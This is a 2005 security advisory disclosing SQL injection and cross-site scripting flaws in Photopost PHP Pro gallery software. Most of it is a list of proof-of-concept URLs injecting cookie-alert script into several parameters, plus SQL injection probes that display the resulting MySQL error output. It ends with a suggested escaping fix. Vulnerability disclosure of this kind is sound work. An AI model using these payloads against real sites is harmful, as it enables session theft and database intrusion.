Dcrab 's Security Advisory http://icis.digitalparadox.org/~dcrab http://www.hackerscenter.com/ Severity: High Title: Multiple Sql injection, and multiple XSS vulnerabilities in Photopost PHP Pro Photo Gallery Software. Date: March 29, 2005 Summary: There are multiple sql injection, xss vulnerabilities in the Photopost PHP Pro Photo Gallery Software. Vendor: Photopost Vendor website: http://www.photopost.com/ Proof of Concept Exploits: http://localhost/photos/showgallery.php?cat=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Pops cookie http://localhost/photos/showgallery.php?si=&sort=1&cat=2&ppuser=&friendemail=%3d'email%40yourfriend.com')this.value%3d''%3b&password=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Pops cookie http://localhost/photos/showgallery.php?si=&sort=1&cat=501&ppuser=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&friendemail=%3d'email%40yourfriend.com')this.value%3d''%3b&password= Pops cookie http://localhost/photos/showgallery.php?si=&sort=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&cat=2&ppuser=&friendemail=%3d'email%40yourfriend.com')this.value%3d''%3b&password= Pops cookie http://localhost/photos/showgallery.php?si=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Pops cookie http://localhost/photos/showmembers.php?si=&sort=4&cat=500&ppuser=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Pops cookie http://localhost/photos/showmembers.php?si=&sort=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&cat=500&ppuser= Pops cookie http://localhost/photos/showmembers.php?si=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&sort=4&cat=500&ppuser= Pops cookie http://localhost/photos/showmembers.php?sl='SQL_INJECTION SQL INJECTION MySQL error reported! Script: showmembers Query: SELECT user,userid,SUM(views) AS tviews,COUNT(*) AS pcount,MAX(lastpost) AS maxlast,MAX(date) AS maxdate,date,SUM(filesize) AS tfilesize,id FROM photos WHERE user LIKE ''SQL_INJECTION%' GROUP BY user ORDER BY user ASC Result: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'SQL_INJECTION%' GROUP BY user ORDER BY user ASC' at line 2 Database handle: Resource id #1 http://localhost/photos/showphoto.php?photo='SQL_ERROR SQL ERROR, INFORMATION DISCLOSURE MySQL error reported! Script: showphoto Query: SELECT id,bigimage,cat,userid,approved,storecat FROM photos WHERE cat='' AND userid= AND approved='1' ORDER BY disporder,lastpost DESC Result: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND approved='1' ORDER BY disporder,lastpost DESC' at line 1 Database handle: Resource id #1 http://localhost/photos/slideshow.php?photo=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&%3bpassword=&%3bsort=1&%3bcat=502 Pops cookie Possible fix: The usage of htmlspeacialchars(), mysql_escape_string(), mysql_real_escape_string() and other functions for input validation before passing user input to the mysql database, or before echoing data on the screen, would solve these problems. Author: These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. Lookout for my soon to come out book on Secure coding with php.